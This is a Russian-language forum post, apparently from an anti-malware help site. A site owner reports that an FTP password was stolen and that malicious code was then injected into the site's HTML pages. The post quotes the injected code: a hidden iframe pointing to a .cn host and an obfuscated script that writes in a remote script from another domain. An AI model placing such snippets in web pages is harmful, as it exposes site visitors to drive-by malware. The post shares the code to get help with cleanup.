Позавчера после соединения с сайтом по фтп (клиент cute ftp) неким зловредом был утащен и передан налево пароль доступа к сайту.
После этого на сайте в html страницки был прописан вредоносный код в виде iframe объекта.
Код я думаю знаком многим:
<iframe src="http://litedownloadseek.cn/in.cgi?cocacola10" width=1 height=1 style="visibility: hidden">
А ещё он такие вещи втыкает:
<!-- ad --><!-- ADS Blok v.0.3 --><script language=javascript>
function sADS(sIteId) {
var thisHome=document;
var sIteName=thisHome.location.hostname;
var adsurl='crew%2eabnc-portal%2ecom%2F';
var adScript='%3Cscr'+'ipt src="http%3A%2F%2F'+adsurl+'show.js?c=';
thisHome.write(unescape(adScript+sIteId+'&s='+sIte Name+'"%3E%3C/scr'+'ipt%3E'));
}
sADS("CI-002643-3");
</script><!-- ADS Blok v.0.3 --><!-- /ad -->
По мелочам что-то выловил при помощи проверки авастом и утилитой касперского. Но подозреваю что не всё.
После этого выполнил проверку согласно здешней инструкции
Прилагаю логи.
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: